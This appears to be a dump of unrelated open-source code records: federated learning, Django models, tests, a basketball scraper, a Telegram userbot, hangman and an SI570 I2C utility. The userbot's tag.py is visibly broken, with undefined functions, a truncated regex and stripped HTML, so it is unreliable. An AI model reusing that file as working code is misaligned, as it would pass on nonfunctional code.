sorted_list][0:int(m/2)]\r\n one_communicate_time=train_time+upload_time\r\n communicate_time.append(one_communicate_time)\r\n #print('选中的用户为',w_idx)\r\n w_glob = FedAvg(w_locals)\r\n\r\n # copy weight to net_glob \r\n net_glob.load_state_dict(w_glob)\r\n #if iter%5==0:s\r\n net_glob.eval()\r\n acc_test, loss_test = test_img(net_glob, dataset_test, args)\r\n net_glob.train()\r\n round_accuracy.append(acc_test)\r\n # print loss\r\n loss_avg = sum(loss_locals) / len(loss_locals)\r\n print('Average loss {:.3f}'.format(loss_avg))\r\n print('Test accuracy {:.2f}%'.format(acc_test))\r\n #print('训练时间:',train_time,',上传时间:',upload_time,'\\n')\r\n loss_train.append(loss_avg)\r\n iter=iter+1\r\n # time_end=time.time() #计时结束\r\n # print('time cost',time_end-time_start,'s')\r\n\r\n Time=time.strftime(\"%m.%d.%H.%M\", time.localtime()) #记录时间,用来画图的命名\r\n plt.figure()\r\n plt.plot(range(len(loss_train)), loss_train)\r\n plt.xlabel('Round')\r\n plt.ylabel('Train_loss')\r\n plt.savefig('./figure/{}_Train loss_{}_IID-{}_Epochs-{}.png'.format(Time,args.model,args.iid,iter))\r\n\r\n # plot accuracy curve\r\n plt.figure()\r\n plot_x=[sum(communicate_time[:i+1]) for i in 
range(len(communicate_time))] #计算横坐标\r\n plt.plot(plot_x,round_accuracy)\r\n plt.xlabel('Time / s')\r\n plt.ylabel('Test_accurac / %')\r\n plt.savefig('./figure/{}_Test accuracy_{}_IID-{}_Epochs-{}.png'.format(Time,args.model,args.iid,iter))\r\n\r\n # save data\r\n plot_data=[] #第一个保存训练损失,第二个保存时间,第三个保存测试精度\r\n plot_data.append(loss_train)\r\n plot_data.append(plot_x)\r\n plot_data.append(round_accuracy)\r\n np.save('./figure data/{}_Figure data_{}_IID-{}_Epochs-{}.npy'.format(Time,args.model,args.iid,iter),plot_data)\r\n print('数据保存成功')\r\n","sub_path":"w select/main_fed.py","file_name":"main_fed.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"499234936","text":"# -*- coding: UTF-8 -*-\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.contrib.gis.db import models as gis_models\nfrom django.contrib.gis.geos import Point, fromstr\nfrom django.contrib.gis.measure import D\nfrom django.utils.timezone import utc\nfrom django.core.paginator import Paginator, EmptyPage\nfrom quan.models import *\nfrom photos.models import *\nfrom rss.models import *\nimport dbarray, json, datetime\n# Create your models here.\n\nclass Circle(models.Model):\n user_source = models.IntegerField() # 1 is app user, 2 is weixinuser\n circle_users = dbarray.IntegerArrayField()\n point = gis_models.PointField()\n objects = gis_models.GeoManager()\n user = models.OneToOneField(User)\n topic_ids = dbarray.IntegerArrayField()\n last_access = models.DateTimeField(default=datetime.datetime.utcnow().replace(tzinfo=utc)) # recorde the last-access datatime\n not_deleted = models.BooleanField() # mark if this circle should be computed\n \n def add_topic(self, topic):\n self.topic_ids.append(topic.id)\n for notice_user_id in self.circle_users:\n notice_user = User.objects.get(id = notice_user_id)\n if not notice_user.circle.not_deleted:\n continue\n notice_user.circle.topic_ids.append(topic.id)\n notice_user.circle.save()\n self.save()\n \n def get_topics(self):\n pass\n\n\ndef create_circle(user, source, curpoint, distance=500000):\n try:\n incircles = Circle.objects.filter(point__distance_lt=(curpoint, D(km=int(distance) / 1000)))\n newcircleusers = []\n if incircles:\n for circle in incircles:\n circle.circle_users.append(user.id)\n circle.save()\n newcircleusers.append(circle.user.id)\n newcircle = Circle(user=user, user_source=source, circle_users=newcircleusers, point=curpoint, not_deleted=True, topic_ids=[])\n newcircle.save()\n return 'OK'\n except Exception as e:\n print(e)\n return 'ERROR'\n\ndef create_circle_from_position(user, source, longitude, latitude, distance=5000):\n point = fromstr(\"POINT(%s %s)\" % (longitude, latitude))\n create_circle(user, source, point, distance)\n\ndef remove_circle(user, source):\n if not Circle.objects.filter(user = user):\n return 'OK'\n del_circle = user.circle\n if del_circle:\n for circle in Circle.objects.all():\n if circle.not_deleted:\n print(del_circle.user.id)\n if del_circle.user.id in circle.circle_users:\n circle.circle_users.remove(del_circle.user.id)\n circle.save()\n del_circle.delete()\n return 'OK'\n \n\nclass JiaTopic(TopicBase):\n point = gis_models.PointField()\n objects = gis_models.GeoManager()\n\nclass JiaComment(CommentBase):\n topic = models.ForeignKey(JiaTopic)\n class Meta:\n unique_together = (\"topic\", \"from_user\")\n \nclass JiaPraise(PraiseBase):\n topic = models.ForeignKey(JiaTopic, 
related_name=\"JiaPraiseTopic\")\n \nclass Photo(PhotoBase):\n topic = models.ForeignKey(JiaTopic)\n\nclass JiaTopicCollection(models.Model):\n user = models.OneToOneField(User)\n collections = dbarray.IntegerArrayField()\n\n\ndef count_praise(topic):\n praise_num = JiaPraise.objects.filter(topic = topic).count()\n return praise_num\n\n\ndef get_nearby_topic(longitude, latitude, page_size = 5, city = None):\n point = fromstr(\"POINT(%s %s)\" % (longitude, latitude))\n topics = JiaTopic.objects.distance(point).order_by('distance')\n topics_list = list(topics)\n topics_list.sort(key=lambda topic:topic.update_time, reverse=True)\n rets = circletopiclist_encode(topics_list)\n newsret = circlenews_encode(get_localnews_bycity(city))\n if newsret:\n rets.insert(0, newsret)\n paginator = Paginator(rets, page_size)\n return paginator\n\ndef get_nearby_point_topic(point, page_size = 5, city = None):\n topics = JiaTopic.objects.distance(point).order_by('distance')\n topics_list = list(topics)\n topics_list.sort(key=lambda topic:topic.update_time, reverse=True)\n rets = circletopiclist_encode(topics_list)\n newsret = circlenews_encode(get_localnews_bycity(city))\n if newsret:\n rets.insert(0, newsret)\n paginator = Paginator(rets, page_size)\n return paginator\n\n\ndef comments_encode(JiaComments):\n rets = []\n number = len(list(JiaComments))\n for i in range(0, number):\n JiaComment = JiaComments[i]\n c = {}\n c['from_user'] = JiaComment.from_user.username\n c['content'] = JiaComment.content\n c['create_time'] = JiaComment.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n print(c)\n rets.append(c)\n return rets\n\n\ndef circletopiclist_encode(topics):\n rets = []\n number = len(list(topics))\n for i in range(0, number):\n topic = topics[i]\n t = {}\n t['topicid'] = topic.id\n t['from_user'] = topic.from_user.username\n t['headurl'] = getheadurl(topic.from_user, 'thumbnail')\n t['content'] = topic.content\n t['comments_num'] = len(JiaComment.objects.filter(topic = topic))\n t['create_time'] = topic.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['update_time'] = topic.update_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['link'] = \"\"\n t['praise_num'] = count_praise(topic)\n rets.append(t)\n #return json.dumps(rets, ensure_ascii=False)\n return rets\n\n\ndef circletopic_encode(topics):\n rets = []\n number = len(list(topics))\n for i in range(0, number):\n topic = topics[i]\n t = {}\n t['topicid'] = topic.id\n t['from_user'] = topic.from_user.username\n t['content'] = topic.content\n t['create_time'] = topic.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['update_time'] = topic.update_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['JiaComments'] = comments_encode(JiaComment.objects.filter(topic = topic))\n print(t)\n rets.append(t)\n return json.dumps(rets, ensure_ascii=False)\n\n\n#序列化圈子新闻\ndef circlenews_encode(news):\n t = {}\n t['topicid'] = -news.id\n t['from_user'] = \"ywb\"\n t['from_user_id'] = 0\n t['headurl'] = getheadurl(None, 'thumbnail')\n t['content'] = news.title\n t['comments_num'] = 0\n t['create_time'] = news.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['update_time'] = news.published_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['link'] = news.link\n return t\n \n #序列化圈子新闻\ndef circlenewslist_encode(newslist):\n rets = []\n number = len(list(newslist))\n for i in range(0, number):\n news = newslist[i]\n t = {}\n t['topicid'] = -news.id\n t['from_user'] = \"养娃宝新闻精选\"\n t['from_user_id'] = 0\n t['headurl'] = getheadurl(None, 'thumbnail')\n t['content'] = news.title\n t['comments_num'] = 0\n 
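# the timestamp format below matches the other encoders in this module ('%Y-%m-%d %H:%M:%S')\n        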
t['create_time'] = news.create_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['update_time'] = news.published_time.strftime('%Y-%m-%d %H:%M:%S' )\n t['link'] = news.link\n t['praise_num'] = 0\n rets.append(t)\n return rets\n\n\ndef get_topics_byids(ids):\n if not ids:\n return None\n topics =JiaTopic.objects.filter(id__in = ids)\n topics_list = list(topics)\n topics_list.sort(key=lambda topics: -ids.index(topics.id))\n return topics_list","sub_path":"jiaquan/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"531578537","text":"from pathlib import Path\nfrom math import ceil\nimport pytest\nfrom pipen.channel import *\nfrom plyrda.all import *\n\nfrom pandas import DataFrame\n\ndef test_create():\n assert isinstance(Channel.create(DataFrame([[1]])), DataFrame)\n\ndef test_from_glob():\n glob = Path(__file__).parent / 'test_*.py'\n glob_files = list(Path(__file__).parent.glob('test_*.py'))\n ch = Channel.from_glob(glob)\n assert ch.shape == (len(glob_files), 1)\n\ndef test_from_pairs():\n glob = Path(__file__).parent / 'test_*.py'\n glob_files = list(Path(__file__).parent.glob('test_*.py'))\n ch = Channel.from_pairs(glob)\n assert ch.shape == (ceil(len(glob_files) / 2.0), 2)\n\ndef test_expand_dir_collapse_files():\n ch0 = Channel.create([(Path(__file__).parent.as_posix(), 1)])\n ch1 = ch0 >> expand_dir(pattern='test_*.py')\n glob_files = list(Path(__file__).parent.glob('test_*.py'))\n assert ch1.shape == (len(glob_files), 2)\n\n ch2 = ch1 >> collapse_files()\n assert ch2.equals(ch0)\n","sub_path":"tests/test_channel.py","file_name":"test_channel.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"554325337","text":"'''Tutorial:\nhttp://www.quuxlabs.com/blog/2010/09/matrix-factorization-a-simple-tutorial-and-implementation-in-python/\n'''\nimport numpy\n\n\ndef matrix_factorization(R, P, Q, K, steps=4, alpha=0.0002, beta=0.02):\n\n Q = Q.T\n\n for step in xrange(steps):\n\n for i in xrange(len(R)):\n\n for j in xrange(len(R[i])):\n\n if R[i][j] > 0:\n\n # tich co huong: hang i X cot j\n eij = R[i][j] - numpy.dot(P[i, :], Q[:, j])\n\n for k in xrange(K): # update\n\n P[i][k] = P[i][k] + alpha * \\\n (2 * eij * Q[k][j] - beta * P[i][k])\n\n Q[k][j] = Q[k][j] + alpha * \\\n (2 * eij * P[i][k] - beta * Q[k][j])\n\n # check the overall error, if it's good enough -> break ^^\n # eR = numpy.dot(P,Q)\n # print(eR)\n\n e = 0\n\n for i in xrange(len(R)):\n\n for j in xrange(len(R[i])):\n\n if R[i][j] > 0:\n\n e = e + pow(R[i][j] - numpy.dot(P[i, :], Q[:, j]), 2)\n\n for k in xrange(K):\n\n e = e + (beta / 2) * \\\n (pow(P[i][k], 2) + pow(Q[k][j], 2))\n\n if e < 0.001:\n\n break\n\n return P, Q.T\n\n\nR = [\n [5, 3, 0, 1],\n [4, 0, 0, 1],\n [1, 1, 0, 5],\n [1, 0, 0, 4],\n [0, 1, 5, 4]\n]\nR = numpy.array(R)\nN = len(R)\nM = len(R[0])\nK = 2\nP = numpy.random.rand(N, K)\nQ = numpy.random.rand(M, K)\n\nnP, nQ = matrix_factorization(R, P, Q, K, 5000)\nnR = numpy.dot(nP, nQ.T)\nprint(nR)\n","sub_path":"matrixFactorization.py","file_name":"matrixFactorization.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"255204897","text":"class Solution:\n # Simple BFS\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n if endWord not in wordList:\n return 0\n queue, 
visit = deque([beginWord]), {beginWord}\n        # set membership makes the wordList existence check O(1)\n        wordList = set(wordList)\n        changes = 1\n        alph = \"abcdefghijklmnopqrstuvwxyz\"\n\n        while queue:\n            changes += 1\n            for _ in range(len(queue)):\n                currWord = queue.popleft()\n                for i in range(len(currWord)):\n                    prefix, suffix = currWord[:i], currWord[i+1:]\n                    for letter in alph:\n                        replacedWord = prefix + letter + suffix\n                        if replacedWord in wordList and replacedWord not in visit:\n                            if replacedWord == endWord:\n                                return changes\n                            visit.add(replacedWord)\n                            queue.append(replacedWord)\n        return 0\n","sub_path":"127.WordLadder.py","file_name":"127.WordLadder.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} {"seq_id":"605563775","text":"from nba_driver import *\n\ndef get_games(driver, game_ids):\n    base_url = 'https://www.basketball-reference.com/boxscores/'\n    def single_game(game_id):\n        tables = dict()\n        game_soup = get_soup(driver, base_url+game_id+'.html')\n        line_score_html = game_soup.find('table', id='line_score')\n        if line_score_html is not None:\n            line_score = pd.read_html(str(line_score_html))[0]\n            correct_cols = ['Team'] + list(line_score.iloc[0][1:])\n            line_score.columns = correct_cols\n            line_score.drop(0, inplace=True)\n            away = str.lower(line_score.iloc[0,0])\n            home = str.lower(line_score.iloc[1,0])\n            tables['line_score'] = line_score\n\n        ff_html = game_soup.find('table', id='four_factors')\n        if ff_html is not None:\n            # wrap the tbody in table tags so pd.read_html can parse it\n            ff_corrected = '<table>' + str(ff_html.tbody) + '</table>
'\n            ff = pd.read_html(ff_corrected)[0]\n            ff.rename(columns={'Unnamed: 0': 'Team'}, inplace=True)\n            tables['ff'] = ff\n\n        for tag in game_soup.find_all('th', attrs={'class': 'over_header'}):\n            tag.decompose()\n\n        table_ids = ['box_' + away + '_basic', 'box_' + away + '_advanced',\n                     'box_' + home + '_basic', 'box_' + home + '_advanced']\n        table_names = ['away_basic', 'away_advanced', 'home_basic', 'home_advanced']\n        for (table_id, table_name) in zip(table_ids, table_names):\n            html = game_soup.find('table', id=table_id)\n            if html is not None:\n                [t.decompose() for t in html('tr', attrs={'class':'thead'})]\n                table = pd.read_html(str(html))[0]\n                table = table.rename(columns={'Starters': 'Player'})\n                table = table[:-1]\n                tables[table_name] = table\n\n        return tables\n\n    rtn = []\n    for g in game_ids:\n        rtn.append(single_game(g))\n        sleep(1)\n    return rtn\n","sub_path":"src/data/nba_data_game.py","file_name":"nba_data_game.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} {"seq_id":"44295125","text":"# CYBERUSERBOT\n#\n\nimport re, os\nfrom random import choice\nimport logging\nfrom functools import partial\n\nfrom telethon import events\nfrom telethon.extensions.markdown import DEFAULT_URL_RE\nfrom telethon.tl import types\nfrom telethon.tl.functions.messages import EditMessageRequest\nfrom telethon.tl.types import (\n    MessageEntityBold,\n    MessageEntityCode,\n    MessageEntityItalic,\n    MessageEntityPre,\n    MessageEntityTextUrl,\n    MessageEntityUnderline,\n)\n\n#------------------ CYBERUSERBOT -------------------#\n\n\nPARSED_ENTITIES = (\n    MessageEntityBold,\n    MessageEntityItalic,\n    MessageEntityCode,\n    MessageEntityPre,\n    MessageEntityTextUrl,\n    MessageEntityUnderline,\n)\n\n\n#------------------ CYBERUSERBOT -------------------#\n\nMATCHERS = [\n    (DEFAULT_URL_RE, parse_url_match),\n    (get_tag_parser(\"**\", MessageEntityBold)),\n    (get_tag_parser(\"__\", MessageEntityItalic)),\n    (get_tag_parser(\"```\", partial(MessageEntityPre, language=\"\"))),\n    (get_tag_parser(\"`\", MessageEntityCode)),\n    (get_tag_parser(\"--\", MessageEntityUnderline)),\n    (re.compile(r\"\\+\\+(.+?)\\+\\+\"), parse_aesthetics),\n    (re.compile(r\"([^/\\w]|^)(/?(r/\\w+))\"), parse_subreddit),\n    (re.compile(r\"(?\\3', newstr, 0)\n    for match in usernexp.finditer(newstr):\n        user = match.group(1)\n        text = match.group(2)\n        name, entities = await event.client._parse_message_text(text, \"md\")\n        rep = f'<a href=\"tg://user?id={user}\">{name}</a>'\n        if entities:\n            for e in entities:\n                tag = None\n                if isinstance(e, types.MessageEntityBold):\n                    tag = \"<b>{}</b>\"\n                elif isinstance(e, types.MessageEntityItalic):\n                    tag = \"<i>{}</i>\"\n                elif isinstance(e, types.MessageEntityCode):\n                    tag = \"<code>{}</code>\"\n                elif isinstance(e, types.MessageEntityStrike):\n                    tag = \"<s>{}</s>\"\n                elif isinstance(e, types.MessageEntityPre):\n                    tag = \"<pre>
{}</pre>
\"\n elif isinstance(e, types.MessageEntityUnderline):\n tag = \"{}\"\n if tag:\n rep = tag.format(rep)\n newstr = re.sub(re.escape(match.group(0)), rep, newstr)\n if newstr != event.text:\n await event.edit(newstr, parse_mode=\"html\")\n","sub_path":"userbot/helpers/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212662246","text":"from .exceptions import *\nimport random\n\n# Complete with your own, just for fun :)\nLIST_OF_WORDS = []\n\n\ndef _get_random_word(list_of_words):\n try:\n return random.choice(list_of_words)\n except IndexError as e:\n raise InvalidListOfWordsException\n pass\n\n\ndef _mask_word(word):\n length = len(word)\n masked = \"*\" * length\n if length == 0 :\n raise InvalidWordException\n return masked\n \n\n\ndef _uncover_word(answer_word, masked_word, character):\n if not (len(character) == 1):\n raise InvalidGuessedLetterException\n if not len(answer_word) == len(masked_word):\n raise InvalidWordException\n if not len(answer_word) >0 :\n raise InvalidWordException \n \n \n newmask = \"\"\n for index,letter in enumerate(answer_word):\n if letter.lower() == character.lower():\n newmask += letter.lower()\n else:\n newmask += masked_word[index].lower()\n return newmask\n \n\n\ndef guess_letter(game, letter):\n if game['answer_word'].lower() == game['masked_word'].lower():\n raise GameFinishedException\n \n if game['remaining_misses'] == 0 :\n raise GameFinishedException()\n \n old_mask = game['masked_word']\n game['previous_guesses'].append(letter.lower())\n new_mask = _uncover_word(game['answer_word'],old_mask,letter)\n game['masked_word'] = new_mask\n \n\n \n if new_mask == old_mask:\n game['remaining_misses'] -= 1\n \n if new_mask.lower() == game['answer_word'].lower():\n raise GameWonException\n \n if game['remaining_misses'] == 0:\n raise GameLostException\n pass\n\n\ndef start_new_game(list_of_words=None, number_of_guesses=5):\n if list_of_words is None:\n list_of_words = LIST_OF_WORDS\n\n word_to_guess = _get_random_word(list_of_words)\n masked_word = _mask_word(word_to_guess)\n game = {\n 'answer_word': word_to_guess,\n 'masked_word': masked_word,\n 'previous_guesses': [],\n 'remaining_misses': number_of_guesses,\n }\n\n return game\n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"477999228","text":"__author__ = 'ewaandrejczuk'\n\nimport matplotlib.pyplot as plt\nfrom plotly.graph_objs import *\nimport numpy as np\n\ndef plot_results1(beta_run, differencesBetweenRankings):\n\n plt.plot(beta_run, differencesBetweenRankings, label =\"Differences Between Rankings\")\n\n plt.ylim(0, 20)\n\n plt.xticks(range(0, 91, 20), [str(x) for x in range(0, 91, 20)], fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.xlabel('Beta')\n plt.ylabel('Difference')\n\n #plot only errorbars\n #plt.errorbar(RunList, ResultsBlamerRuns, yerr=error_bl, linestyle=\"None\", marker=\"None\", color=\"blue\")\n #plt.errorbar(RunList, ResultsAveragerRuns, yerr=error_avg, linestyle=\"None\", marker=\"None\", color=\"green\")\n plt.legend()\n plt.show()\n\ndef plot_results2(x,y):\n width = 4 #/1.5\n plt.bar( x, y, width, color=\"blue\" )\n plt.ylabel( \"% of improvement of CJ wrt SAWA\" )\n plt.xlabel( 'Beta parameter value' )\n plt.show()\n\n#if __name__ == \"__main__\":\n\n# beta_run = [10, 20, 30, 40, 50, 60, 70, 80, 90, 
100]\n# difference = [10.28379914543377, 12.584340963242225, 16.969843225638868, 16.632541257895241, 17.697784228793335, 15.81089710776611, 16.080542604427485, 17.983242804140943, 16.062275743897569, 17.589846090923935]\n# plot(difference,beta_run)\n #plot_experiment2(beta_run, difference)\n\n\n","sub_path":"TeamTrust/Plot_results.py","file_name":"Plot_results.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468415793","text":"# Measures the current output frequency from SI570\n# also one can configure it to a different frequency\nimport sys\nimport numpy as np\nbedrock_dir = \"../../\"\nsys.path.append(bedrock_dir + \"peripheral_drivers/i2cbridge\")\nsys.path.append(bedrock_dir + \"badger\")\nsys.path.append(bedrock_dir + \"projects/common\")\nimport leep\nimport assem\nimport testcase\nfrom time import sleep\n\n\n# select one port of an I2C bus multiplexer\n# port_n must be between 0 and 7\ndef busmux_sel(s, port_n):\n tca9548a_addr = 0xe0\n return s.write(tca9548a_addr, 1 << port_n, [])\n\n\ndef busmux_reset(s):\n a = []\n a += s.pause(10)\n a += s.hw_config(1) # turn on reset\n a += s.pause(10)\n a += s.hw_config(0) # turn off reset\n a += s.pause(10)\n return a\n\n\ndef hw_test_prog():\n s = assem.i2c_assem()\n si570_list = [0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12]\n a = []\n a += s.pause(2) # ignored?\n a += s.set_resx(3) # avoid any confusion\n a += busmux_reset(s)\n #\n a += busmux_sel(s, 6) # App bus\n a += s.read(0xe0, 0, 1, addr_bytes=0) # busmux readback\n\n a += s.write(0x42, 6, [0xfe, 0x77]) # U39 Configuration registers\n a += s.write(0x42, 2, [0x00, 0x88]) # U39 output register for clkmux_reset and SI570_OE\n # pull down MOD_SEL, RESET and LPMODE, i.e set them as outputs\n a += s.write(0x44, 6, [0x37, 0x37]) # U34 Configuration registers\n a += s.write(0x44, 2, [0x48, 0x48]) # U34 Output registers\n\n a += s.pause(100)\n for ax in si570_list:\n a += s.read(0xee, ax, 1) # config register0 with 2 bytes to read\n\n a += s.trig_analyz()\n #\n jump_n = 9\n a += s.jump(jump_n)\n a += s.pad(jump_n, len(a))\n #\n # Start of polling loop\n a += s.set_resx(0)\n a += busmux_sel(s, 6) # App bus\n # keep clkmux_reset high always\n a += s.write(0x42, 2, [0x00, 0x84]) # Output registers\n a += s.pause(2)\n a += s.read(0x42, 0, 2) # Physical pin logic levels\n a += s.read(0x44, 0, 2) # Physical pin logic levels\n\n a += s.buffer_flip() # Flip right away, so most info is minimally stale\n # This does mean that the second readout of the PCA9555 will be extra-stale\n # or even (on the first trip through) invalid.\n a += s.pause(3470)\n #\n a += busmux_sel(s, 6) # App bus\n a += s.write(0x42, 2, [0x00, 0x88]) # Output registers\n a += s.pause(2)\n a += s.read(0x42, 0, 2) # Physical pin logic levels\n a += s.pause(3470)\n if False: # extra weird little flicker\n a += s.write(0x42, 2, [0x00, 0x84]) # Output registers, LD12\n a += s.pause(1056)\n a += s.write(0x42, 2, [0x00, 0x88]) # Output registers, LD11\n a += s.pause(1056)\n a += s.jump(jump_n)\n return a\n\n\ndef hw_write_prog(reg):\n s = assem.i2c_assem()\n a = []\n a += s.pause(2) # ignored?\n a += s.set_resx(3) # avoid any confusion\n a += busmux_reset(s)\n #\n a += busmux_sel(s, 6) # App bus\n a += s.read(0xe0, 0, 1, addr_bytes=0) # busmux readback\n\n # Freeze the DCO by setting Freeze DCO=1 (bit 4 of register 137).\n a += s.write(0xee, 0x89, [0x10])\n # Write the new frequency configuration (RFREQ, HS_DIV, and N1)\n a += s.write(0xee, 0x0d, 
[reg[0]])\n a += s.write(0xee, 0x0e, [reg[1]])\n a += s.write(0xee, 0x0f, [reg[2]])\n a += s.write(0xee, 0x10, [reg[3]])\n a += s.write(0xee, 0x11, [reg[4]])\n a += s.write(0xee, 0x12, [reg[5]])\n # Unfreeze the DCO by setting Freeze DCO=0 (register 137 bit 4)\n a += s.write(0xee, 0x89, [0x00])\n # assert the NewFreq bit (bit 6 of register 135) within 10 ms.\n a += s.write(0xee, 0x87, [0x40])\n\n a += s.pause(100)\n\n si570_list = [0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12]\n for ax in si570_list:\n a += s.read(0xee, ax, 1) # config register0 with 2 bytes to read\n a += s.trig_analyz()\n #\n jump_n = 9\n a += s.jump(jump_n)\n a += s.pad(jump_n, len(a))\n return a\n\n\n# check if the final output frequency is <= 50 ppm\ndef check(fin):\n ppm = ((fin)*(1/args.new_freq) - 1.0)*1e6\n if (abs(ppm) <= 50):\n sys.exit(0)\n else:\n print('SI570 final frequency measurement is not correct, out of spec by %i ppm' % ppm)\n\n\ndef compute_si570(addr, key):\n # using keyword just to keep print consistent\n prog = hw_test_prog()\n result = testcase.run_testcase(addr, prog, result_len=359, debug=args.debug, verbose=args.verbose)\n if args.debug:\n print(\" \".join([\"%2.2x\" % p for p in prog]))\n print(\"\")\n for jx in range(16):\n p = result[jx*16:(jx+1)*16]\n print(\"%x \" % jx + \" \".join([\"%2.2x\" % r for r in p]))\n\n ib = 3*32 # init result memory base, derived from set_resx(3)\n a = result[ib+1:ib+7]\n\n hs_div = (a[0] >> 5) + 4\n n1 = (((a[0] & 0x1f) << 2) | (a[1] >> 6)) + 1\n rfreq = np.uint64((((a[1] & 0x3f) << 32) | (a[2] << 24) | (a[3] << 16) | (a[4] << 8) | a[5])) / (2**28)\n\n freq_default = addr.reg_read([\"frequency_si570\"])\n default = (freq_default[0]/2**24.0)*125\n # keep everything in MHz\n fdco = default * n1 * hs_div\n fxtal = fdco / rfreq\n if args.verbose:\n print('%s SI570 settings:' % key)\n print('REFREQ: %4.4f' % rfreq)\n print('N1: %3d' % n1)\n print('HSDIV: %2d' % hs_div)\n print('Internal crystal frequency: %4.4f MHz' % fxtal)\n print('DCO frequency: %4.4f MHz' % fdco)\n print('Output frequency: %4.4f MHz' % default)\n else:\n print('%s SI570 output frequency: %4.4f MHz' % (key, default))\n return fxtal, default\n\n\ndef config_si570(addr):\n if args.new_freq:\n fxtal, default = compute_si570(addr, \"Measured\")\n # if first measured frequency and new output frequency are < 10 ppm don't change/update\n if (abs(((default)*(1/args.new_freq) - 1.0)*1e6) < 10):\n sys.exit(0)\n else:\n print(\"#######################################\")\n print(\"Changing output frequency to %4.4f MHz\" % args.new_freq)\n # DCO frequency range: 4850 - 5670MHz\n # HSDIV values: 4, 5, 6, 7, 9 or 11 (subtract 4 to store)\n # N1 values: 1, 2, 4, 6, 8...128\n # Find the lowest acceptable DCO value (lowest power) see page 15 from datasheet\n best = [0, 0, 6000.0]\n for i in range(0, 65):\n n1_i = i*2\n if i == 0:\n n1_i = 1\n for hsdiv_i in [4, 5, 6, 7, 9, 11]:\n fdco_i = args.new_freq * n1_i * hsdiv_i\n if (fdco_i > 4850.0) and (fdco_i < 5670.0):\n # print(n1_i-1, hsdiv_i-4, fdco_i)\n if fdco_i < best[2]:\n best = [n1_i, hsdiv_i, fdco_i]\n\n if best[2] > 5700.0:\n raise Exception('Could not find appropriate settings for your new target frequency')\n\n if args.debug:\n print('New best option is:')\n print(best[0]-1, best[1]-4, best[2])\n\n rfreq = int(best[2] * float(2**28) / fxtal)\n rfreq_i = int(best[2] / fxtal)\n n1 = best[0]-1\n hs_div = best[1]-4\n if args.verbose:\n print('Expected SI570 settings:')\n print('REFREQ: %4.4f' % rfreq_i)\n print('N1: %3d' % best[0])\n print('HSDIV: %2d' % best[1])\n 
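# e.g. for the 185 MHz target mentioned in the usage notes, the search lands on N1=4, HSDIV=7,\n                # since fdco = 185 * 4 * 7 = 5180 MHz is the lowest candidate inside the 4850-5670 MHz window\n                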
print('DCO frequency: %4.4f MHz' % best[2])\n reg = []\n # build registers\n reg7 = (hs_div << 5) | ((n1 & 0x7C) >> 2) # reg 7: hs_div[2:0], n1[6:2]\n reg8 = ((n1 & 3) << 6) | (rfreq >> 32) # reg 8: n1[1:0] rfreq[37:32]\n reg9 = (rfreq >> 24) & 0xff # reg 9: rfreq[31:24]\n reg10 = (rfreq >> 16) & 0xff # reg 10: rfreq[23:16]\n reg11 = (rfreq >> 8) & 0xff # reg 11: rfreq[15:8]\n reg12 = rfreq & 0xff # reg 12: rfreq[7:0]\n reg = [reg7, reg8, reg9, reg10, reg11, reg12]\n # write new registers\n chg = hw_write_prog(reg)\n result1 = testcase.run_testcase(addr, chg, result_len=359, debug=args.debug, verbose=args.verbose)\n if args.debug:\n print(\" \".join([\"%2.2x\" % p for p in chg]))\n print(\"\")\n for jx in range(16):\n p = result1[jx*16:(jx+1)*16]\n print(\"%x \" % jx + \" \".join([\"%2.2x\" % r for r in p]))\n # sleep for a second, so we can read the final frequency\n sleep(1)\n # read final values and output frequency?\n print(\"#######################################\")\n _, freq = compute_si570(addr, \"Final\")\n check(freq)\n else: # read only current settings if you don't want to change anything\n print(\"#######################################\")\n compute_si570(addr, \"Measured\")\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(\n description=\"Utility for configuring SI570 with i2cbridge attached to Packet Badger\")\n parser.add_argument('-a', '--addr', default='192.168.19.10', help='IP address')\n parser.add_argument('-p', '--port', type=int, default=803, help='Port number')\n parser.add_argument('-f', '--new_freq', type=float, default=None, help='Enter new SI570 output frequency in MHz')\n parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')\n parser.add_argument('-d', '--debug', action='store_true', help='print raw arrays')\n\n args = parser.parse_args()\n leep_addr = \"leep://\" + str(args.addr) + str(\":\") + str(args.port)\n print(leep_addr)\n\n addr = leep.open(leep_addr, instance=[])\n\n # dev = lbus_access.lbus_access(args.addr, port=args.port, timeout=3.0, allow_burst=False)\n\n config_si570(addr)\n\n# usage:\n# To read current output frequency:\n# python3 config_si570.py -a 